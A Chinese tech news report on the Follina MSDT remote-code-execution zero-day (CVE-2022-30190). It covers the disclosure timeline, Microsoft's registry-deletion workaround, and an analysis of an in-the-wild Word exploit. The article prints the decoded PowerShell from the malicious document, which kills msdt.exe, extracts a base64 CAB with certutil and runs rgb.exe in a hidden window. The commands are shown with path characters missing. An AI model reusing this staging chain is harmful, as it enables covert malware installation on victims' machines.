首页 > 业界 > 关键词  > base64最新资讯  > 正文

专家发现高危代码执行零日漏洞 所有支持Windows版本均受影响

2022-06-01 08:38 · 稿源: cnbeta

安全专家近日发现了高危的代码执行零日漏洞,目前所有支持的 Windows 系统均受影响。已经有相关证据表明至少在 7 周前就有黑客利用该漏洞,在不触发 Windows Defender 以及其他终端保护产品的情况下,在受害者设备上安装恶意程序。

Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于 Microsoft Support Diagnostic Tool 中的漏洞已经于 4 月 12 日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击。

不过给该研究人员的回复中,微软安全响应中心团队并未将报告的行为视为安全漏洞,因为据推测,MSDT 诊断工具在执行有效负载之前需要密码。

不过本周一,微软改变了口风,将该漏洞标识为 CVE-2022-30190,并将其描述为“关键”(critical)漏洞。

在公告中写道:“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户”。

在本文发表时,微软尚未发布补丁。相反,它建议客户通过以下方式禁用 MSDT URL 协议:

1. 以管理员身份运行命令提示符。

2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename”

3. 执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”

虽然最初被微软遗漏了,但当研究人员发现周五上传到 VirusTotal 的 Word 文档利用了以前未知的攻击媒介时,该漏洞再次被发现。

根据研究员 Kevin Beaumont 的分析,该文档使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。

虽然在理论上这不太可能实现,但事实上确实是可以的。当文档中的命令被解码时,它们会转换为:

$cmd ="c:Windowssystem32cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:userspublicfor /r

%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /yfindstr TVNDRgAAAA 1.rar1.tcertutil -decode 1.t 1.c expand 1.c -F:* .rgb.exe";

根据 Huntress 的解释,该脚本实现的操作为

在隐藏窗口运行以下操作

1. 如果 msdt.exe 正在运行,则终止它

2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串

3. 将此 Base64 编码的 CAB 文件存储为 1.t

4. 解码Base64编码的CAB文件保存为1.c

5. 将1.c CAB文件展开到当前目录,最后:

6. 执行rgb.exe(大概压缩在1.c CAB文件里面)

举报

  • 相关推荐
  • HTTP 402与微支付:一段沉睡三十年的代码,在AI时代觉醒

    30年前HTTP 402协议因交易成本高、体验割裂和技术缺失而失败,如今AI时代带来消费原子化、决策流线化和主体去人化三大变革,使微支付成为可能。AI代理通过钱包身份、风控机制和无缝支付协议实现高频小额交易,重构互联网经济逻辑,让HTTP 402从理想变为AI经济的支付基石。

  • 曝苹果招募全球研究员 发现iPhone漏洞最高赏金50万美元

    苹果现已开放2026年安全研究设备计划(SRD)申请,邀请全球各地资深安全研究人员参与,为其提供解锁版iPhone,发现漏洞最高奖金可达50万美元。 据报道,SRD并非鼓励越狱,而是为获批研究人员提供特别版本的解锁iPhone,用于合法深入测试iOS系统安全。 该计划旨在让专家在受控环境中探索系统底层,帮助苹果提前发现并修复漏洞。申请已于2025年9月开放,将在10月31日截止。

  • 海尔中央空调运行频率跨度唯一做到156Hz,行业最宽

    海尔中央空调在2025年展示超宽频科技,实现4Hz至160Hz超宽频运行,超越行业6Hz至130Hz水平,成为唯一达156Hz频率跨度的品牌。该技术解决行业运行频率范围窄的痛点,在冬季制热时提升低温制热能力,确保极寒天气稳定运行。日常使用中,4Hz超低频运行功率仅124W,显著节能,同时避免噪音问题。通过AI算法赋能,重新定义行业宽温域运行标准,展现中国空调品牌的创新能力。

  • AIbase资讯:每天五分钟,全面掌握AI技术变革与工具动态

    AIbase资讯平台致力于为AI从业者、创业者和技术爱好者提供全面准确的全球AI动态。平台实时监控数百个AI新闻源,覆盖技术论文、产业政策、产品更新和行业事件,确保信息跨学术、应用、技术、市场等多维度。通过专业整合和实时更新,帮助用户快速掌握大语言模型、生成式AI、计算机视觉、智能体开发等关键赛道进展。平台还提供强大的AI工具导航功能,收录大量国内外工具与应用,覆盖文本生成、图像处理、代码开发等多个类别。每日五分钟,全面了解AI动态,掌握行业关键信息。

  • 贝锐向日葵:破解企业远程办公难题,快速搭建远程管理体系

    远程办公是企业日常办公的重要补充,能显著降低运营成本、提升体系效率与灵活性,并增强业务容灾能力。基于远程控制技术的方案还能优化软硬件资源利用与维护水平,保障数据安全。企业需关注部署成本、办公设备授权、远程办公的持续稳定性及效率监督等痛点。向日葵企业远程办公方案通过自动化批量处理、软硬件结合及完善管理框架,实现高效部署与权限管理,支持多种场景下的远程办公需求,并具备操作追踪与日志功能,确保合规性与可靠性。

  • 华为穿戴音频新品发布会定档9月24日:WATCH GT6等将发布

    今日,华为官方正式宣布,将于9月24日举办穿戴音频新品发布会,届时备受期待的华为WATCH GT6系列智能手表与华为FreeClip2耳夹耳机二代将同台登场,引发科技圈与消费者的高度关注。 作为本次发布会的重头戏,华为WATCH GT6系列将成为GT系列首款支持星闪技术的智能手表。据透露,该系列预计推出WATCH GT6和WATCH GT6Pro两款机型,覆盖41mm至46mm表盘尺寸,满足不同用户需求。其中,�

  • AI火花集|从“听命令”到“懂人心”,阿里云携手嘉兴声芯拆解智能语音落地路径

    未来AI硬件将突破“机械响应”局限,语音交互成为核心入口。行业数据显示语音设备出货量激增,72%用户偏好语音交互。智能硬件面临算力不足、模型难选、成本高等挑战。嘉兴声芯通过端云协同方案,在本地处理隐私数据,云端进行语义理解,实现高效安全的语音交互。该方案已在AI玩具、车载后装等场景落地,推动硬件从工具向智能伴侣转型。

  • Kimi K2模型更新至0905版本:更强代码能力 更快API性能

    月之暗面科技有限公司宣布其Kimi K2模型更新至0905版本,带来更强的代码能力和更快的API性能。此次更新进一步提升了Kimi K2在真实编程任务中的表现,特别是在公开基准测试和实际编程任务中展现出更好的性能。 Kimi K2模型的Agentic Coding能力得到显著提升,这使得它在处理复杂的编程任务时更加高效。同时,前端编程体验也得到了升级,生成的代码不仅更加美观,而且更具实用

  • 真我15 Pro外观公布 将于9月16日正式发布

    今日,真我手机官方正式公布了真我15Pro的外观设计,瞬间吸引了众多消费者的目光。此次真我15Pro带来了流光白和暮光绿两款时尚配色,其中流光白版本更是采用了行业首创的流光晕染工艺,将千变万化的夜色光影与时尚美学完美融合,使得每一台流光白版本的手机都呈现出独一无二的白色效果,极具个性与魅力。 在外观设计上,真我15Pro不仅配色独特,还采用了后置三摄设

  • 4000万年轻人,在B站“玩梗”适乐肤

    ​2025年,美妆行业正加速“洗牌”。 化妆品报数据显示,2025年上半年,美妆护肤市场销售额超过2352亿元,同比增加10.1%。虽然相比去年有了明显增长态势,但市场竞争格局同样在不断变化。 一面是国际大牌、国货品牌与白牌同台竞技,各路商家发挥自身的长板和优势,在存量生意场争取更大蛋糕;另一面,从品牌营销侧看,传统“铺物料”的形式触及人群天花板,品牌获客�

今日大家都在搜的词: